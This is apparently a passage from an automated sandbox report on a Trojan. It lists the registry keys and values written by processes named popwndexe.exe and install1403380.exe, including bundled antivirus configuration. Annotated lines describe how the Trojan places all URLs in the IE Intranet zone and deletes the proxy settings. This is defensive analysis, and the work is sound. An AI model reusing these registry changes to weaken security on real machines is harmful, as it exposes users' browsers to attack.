"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A D6 D8 05 93 AE 25 58 0C 0D 0C 0A 83 4B 32 A7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies the IE security-zone settings so that all local web nodes with no dots in their names, which do not map to any other zone, are placed in the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone settings so that all web nodes that bypass the proxy are placed in the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies the IE security-zone settings so that all URLs are placed in the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process popwndexe.exe:592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 87 A9 F2 4A DF B7 2F 6C 9A 4E 2D FD 89 D2 96"
The process install1403380.exe:1196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\rdskmon\rdisk_exec_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\bamon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\AutoTreatInfected]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\SmartScan]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\AlertSound]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\AutoTreatInfected]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\rdskmon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\eshopmon\state]
"ver" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\rising\RAV\cfg\BRScan\pro_path]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\UseAI]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\officemon\exploit_scan_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\selfdef\protect_registries]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\PackageSizeLimit]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV]
"DisplayVersion" = "24.00.43.08"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\vpatchmon\func]
"(Default)" = "3"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\GlobalCache]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\homepageguard\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanReportRoutine\DenferTime]
"(Default)" = "255"
[HKLM\SOFTWARE\MozillaPlugins\@rising.com.cn/nprising]
"Path" = "%Program Files%\Rising\RAV\nprising.dll"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\PollingInterval]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg]
"ver" = "24"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\rising\lockie]
"url6" = "YA8MJhwfCQ0aRhtOThEPWQ8TCAoHWEZPAhdBCUNcV/U="
"url1" = "YA8MJhwfCQ0aRhtOThEPWQ8TCAoHWEZPAhdBCUNcUP4="
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\AlertSound]
"ver" = "1"
[HKLM\SOFTWARE\rising\lockie]
"url2" = "YA8MJhwfCQ0aRhtOThEPWQ8TCAoHWEZPAhdBCUNcU/E="
[HKLM\SOFTWARE\rising\RAV\cfg\EnhancedSelfProtect\Enable]
"ver" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayVersion" = "23.00.01.03"
[HKLM\SOFTWARE\rising\lockie]
"url9" = "YA8MJhwfCQ0aRhtOThEPWQ8TCAoHWEZPAhdBCUNcWPY="
"url8" = "YA8MJhwfCQ0aRhtOThEPWQ8TCAoHWEZPAhdBCUNcWfc="
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\HTTP\Mode]
"(Default)" = "Post"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\webmon\scriptmon_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\selfdef\state]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"Publisher" = "Beijing Rising Information Technology, Inc."
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\AutoTreatInfected]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\filemon\file_ext_filter]
"(Default)" = "VBS;VBE;JS;JSE;LSP;FAS;ASP;HTT;HTA;CSS;WSH;MHT;JSP;PHP;HTM;HTML;RB;LUA;PY;EXE;COM;SYS;VXD;DRV;DLL;BIN;OVL;386;FON;DOC;DOT;XLS;XLT;PPT;BAT;SCT;OCX;CPL;LNK;EML;NWS;PIF;SHS;MAI;SCR;ZIP;7Z;ARJ;BZ2;BZIP2;CAB;GZ;GZIP;HFS;ISO;LHA;LZH;LZMA;RAR;TAR;"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanReportRoutine\DisableLog]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\InsufficientSpaceHandleMethod]
"ver" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV]
"DisplayName" = "Rising Software Deployment System"
[HKLM\SOFTWARE\rising\rscommon]
"DataPath" = "%Documents and Settings%\All Users\Application Data\Rising\common"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\mailmon\verdict_vir_found]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\rdskmon\autorun_disable_state]
"(Default)" = "1"
[HKLM\SOFTWARE\MozillaPlugins\@rising.com.cn/nprising]
"Description" = ""
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanRemovableStorage\DisableLog]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\eshopmon\sites]
"(Default)" = "D8 6D 9D 5B 51 7F 00 00 2A 00 2E 00 74 00 61 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanReportRoutine\Report]
"(Default)" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}]
"ProcID" = "{CF565346-22FD-6648-3030-303030303030}"
[HKLM\SOFTWARE\rising\RAV\cfg\SoftwareSafe\Default\ProtectConfig\ProtectType]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\bamon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\System\CurrentControlSet\Services\SysMon]
"Type" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\mailmon\verdict_vir_found]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\notify_user]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\rising\RAV\cfg\SoftwareSafe\ProtectConfig\ProtectType]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\SmartScan]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\Default\ShowLogonIcon]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\DisableLog]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\filemon\state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\officemon\instrmon_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\EnhancedSelfProtect\Enable]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\officemon\app_filters]
"(Default)" = "00 00 00 00"
[HKLM\SOFTWARE\MozillaPlugins\@rising.com.cn/nprising]
"vender" = "Rising"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\eshopmon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\webmon\app_filters]
"(Default)" = "2D 00 2D 00 74 00 79 00 70 00 65 00 3D 00 00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\WorkMode\AutoEnterSilenceMode]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\rdskmon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\rdskmon\scan_timeout]
"(Default)" = "30000"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\NoTrayIcon]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV]
"URLInfoAbout" = "http://help.ikaka.com/"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\eshopmon\sites]
"(Default)" = "D8 6D 9D 5B 51 7F 00 00 2A 00 2E 00 74 00 61 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\AlertSound]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\PackageSizeLimit]
"ver" = "3"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}]
"ProcKey" = "RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\AlertSound]
"ver" = "1"
[HKLM\System\CurrentControlSet\Services\SysMon]
"Group" = "Boot Bus Extender"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\PopupInterval]
"(Default)" = "600"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\PreciseFormat]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\vpatchmon\func]
"(Default)" = "3"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\filemon\file_ext_filter]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\bamon\verdict_vir_found]
"(Default)" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\NavigateXml\bxfix]
"(Default)" = "http://rscloud.rising.net.cn/navigate_bwfix.xml"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudSafe\Default\UseCloudDefence]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\Default\SmartRelocate]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\homepageguard\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\whitemask]
"(Default)" = "25"
[HKLM\System\CurrentControlSet\Services\sysmon\Instances\sysmon]
"Altitude" = "370070"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\GlobalCache]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\zone]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\SmartScan]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanReportRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\officemon\instrmon_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\rs_processes]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\vpatchmon\func]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanRemovableStorage\FileNameFilter]
"(Default)" = ".exe|.dll"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\REGO]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\AlertSound]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanRemovableStorage\DisableLog]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BackgroundScan\State]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\PreciseFormat]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\filemon\file_ext_filter]
"ver" = "1"
[HKCU\Software\MozillaPlugins\@rising.com.cn/nprising]
"Path" = "%Program Files%\Rising\RAV\nprising.dll"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\AlertSound]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\filemon\mode]
"(Default)" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\Default\ShowAgent]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\filemon\mode]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\HTTP\Count]
"(Default)" = "592"
[HKLM\SOFTWARE\rising\RAV\cfg\RsLog\Default\KeepDays]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\AutoTreatInfected]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\UninstallProtect]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\NoTrayIcon]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\ScanResultCountPerPage]
"(Default)" = "268435455"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"UninstallString" = "%Program Files%\Rising\RSD\Setup.exe /UNINSTALL /PRODUCT=RSD"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\QQMgrInterval]
"(Default)" = "900"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"InstallLocation" = "%Program Files%\Rising\RSD"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanReportRoutine\AutoTreatInfected]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV]
"InstallPath" = "%Program Files%\Rising\RAV"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\rdskmon\rdisk_exec_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\Baidu]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\writelog]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\mailmon\state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\webmon\instrmon_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\PackageSizeLimit]
"ver" = "4"
[HKLM\SOFTWARE\rising\RAV]
"Type" = "17"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\whitemask]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\BRScan\reg_path]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV]
"Version" = "24.00.43.08"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\UseAI]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\level]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\DisableLog]
"(Default)" = "1"
[HKLM\SOFTWARE\MozillaPlugins\@rising.com.cn/nprising\MimeType]
"(Default)" = ""
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\ShowLogonIcon]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\PreciseFormat]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\eshopmon\sites]
"ver" = "16"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\NoBacore]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\ShowScanAd]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV]
"UninstallString" = "%Program Files%\Rising\RSD\Setup.exe /UNINSTALL /PRODUCT=RAV"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\filemon\state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanRemovableStorage\MaxScanDeep]
"ver" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsLog\KeepDays]
"(Default)" = "60"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\AlertSound]
"ver" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV]
"DisplayIcon" = "%Program Files%\Rising\RSD\Setup.exe"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\filemon\mode]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanRemovableStorage\MaxScanDeep]
"(Default)" = "2"
[HKLM\System\CurrentControlSet\Services\sysmon\Instances]
"DefaultInstance" = "sysmon"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\NavigateXml\conntest]
"(Default)" = "http://rscloud.rising.net.cn/cloud.html"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\officemon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsLog\Default\KeepDays]
"(Default)" = "60"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\AlertSound]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\AutoTreatInfected]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\webmon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\PackageSizeLimit]
"ver" = "4"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\Default\InsufficientSpaceHandleMethod]
"(Default)" = "0"
[HKLM\System\CurrentControlSet\Services\SysMon]
"DebugLevel" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanReportRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudSafe\UseCloudEngine]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\selfdef\notify_user]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\AutoTreatInfected]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\Enable]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\PreciseFormat]
"ver" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\mailmon\port_list]
"(Default)" = "110=110|25=120"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\PreciseFormat]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\BRScan\reg_path]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\AutoTreatInfected]
"(Default)" = "1"
[HKLM\System\CurrentControlSet\Services\SysMon]
"Description" = "Rising System Monitor Driver"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\whitemask]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\mailmon\state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\lockie]
"url3" = "YA8MJhwfCQ0aRhtOThEPWQ8TCAoHWEZPAhdBCUNcUvA="
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\PreciseFormat]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\UseAI]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV]
"DataPath" = "%Documents and Settings%\All Users\Application Data\Rising\Rav"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\zone]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\selfdef\protect_pathnames]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\NavigateXml\oswhite]
"(Default)" = "http://rscloud.rising.net.cn/navigate_oswhite.xml"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\PreciseFormat]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\BRScan]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\officemon\app_pathnames]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\webmon\app_pathnames]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\AutoTreatInfected]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\NavigateXml\navig]
"(Default)" = "http://rscloud.rising.net.cn/navigate.xml"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\filemon\mode]
"(Default)" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\selfdef\protect_pathnames]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\BaiduInterval]
"(Default)" = "900"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\bamon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\PackageSizeLimit]
"ver" = "3"
[HKLM\System\CurrentControlSet\Services\SysMon]
"DLibPath" = "%Program Files%\Rising\RAV\rsdll.dll"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\homepageguard\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\PackageSizeLimit]
"ver" = "3"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\filemon\verdict_vir_found]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\AlertSound]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\InsufficientSpaceHandleMethod]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\filemon\notify_timeout]
"(Default)" = "131072"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\level]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\EnhancedSelfProtect\State]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
